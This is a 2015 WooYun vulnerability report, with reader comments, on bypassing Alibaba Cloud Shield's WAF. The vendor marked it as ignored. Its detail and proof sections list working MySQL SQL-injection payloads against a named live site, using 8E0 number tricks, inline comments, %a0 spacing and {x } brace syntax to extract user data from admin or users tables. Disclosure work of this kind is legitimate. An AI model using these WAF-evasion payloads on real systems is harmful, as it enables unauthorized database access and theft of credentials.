当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110382

漏洞标题:阿里巴巴云盾防御策略可以bypass

相关厂商:阿里巴巴

漏洞作者: izy

提交时间:2015-04-26 10:51

修复时间:2015-04-27 09:43

公开时间:2015-04-27 09:43

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-26: 细节已通知厂商并且等待厂商处理中
2015-04-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

阿里云盾防御bypass

详细说明:

现在很多waf都是检查单词边界,但是mysql很多特性导致我们可以绕过这些边界检查。
http://www.alijijinhui.org/index.php?id=1 union -------OK
http://www.alijijinhui.org/index.php?id=1 union select -------拦截
用mysql特性8E0 bypass 详情见 http://zone.wooyun.org/content/16772
http://www.alijijinhui.org/index.php?id=08Eunion select -------bypass
http://www.alijijinhui.org/index.php?id=08Eunion select 1,2,3%23 -------bypass
然后我们随便查一个表admin
/index.php?id=08Eunion select user from %23 -------拦截
当我们查到from时就被拦截了,说明from是关键字,来验证一下
/index.php?id=08Eunion select user fr1om/*./*/admin%23 ------- bypass
说明from被拦截了
现在我们只要绕过from这的拦截就完全bypass啦~
而首先的思路是测试单词边界
http://www.alijijinhui.org/index.php?id=8E0union/*.1*/select user from%a0admin%23 -------- bypass
http://www.alijijinhui.org/index.php?id=1 union/*.1*/select user from%a0admin%23 -------- bypass
另外一种方式
先来了解一下mysql的一个tip:
select{x user}from{x admin} 这样也是可以查询的~
本地测试ok:
select user from users where user_id =8E0union/*.1*/select{x user}from{x users}#

屏幕快照 2015-04-25 下午10.37.03.png


暑假来阿里实习就可以来膜拜各位大牛了!~ :-D

漏洞证明:

最终payload:
http://www.alijijinhui.org/index.php?id=8E0union/*.1*/select{x user}from{x users}%23
http://www.alijijinhui.org/index.php?id=1 union/*.1*/select user from%a0admin%23

屏幕快照 2015-04-25 下午10.42.55.png

修复方案:

~~~

版权声明:转载请注明来源 izy@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-27 09:43

厂商回复:

亲,经审核您所报告的问题,不存在安全隐患。如果您对云盾有其他任何好的建议,请随时在ASRC报告,我们会第一时间响应。感谢你对我们的支持与关注。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-04-27 11:25 | hack2012 ( 实习白帽子 | Rank:31 漏洞数:3 | 关注信息安全 http://www.waitalone.cn/)

    这个bypass应该能绕过N多的waf的,当然条件所限必须是mysql

  2. 2015-04-27 11:40 | izy ( 普通白帽子 | Rank:111 漏洞数:22 | http://1zy.pw/)

    @hack2012 数据库端的bypass大多是利用了数据库的特性....貌似很多waf都是基于单词边界的检测

  3. 2015-05-02 02:40 | phith0n 认证白帽子 ( 核心白帽子 | Rank:656 漏洞数:107 | 一个想当文人的黑客~)

    来bypass我博客的waf

  4. 2015-05-03 23:11 | izy ( 普通白帽子 | Rank:111 漏洞数:22 | http://1zy.pw/)

    @phith0n 时雨牛快带我用撸啊写waf :-)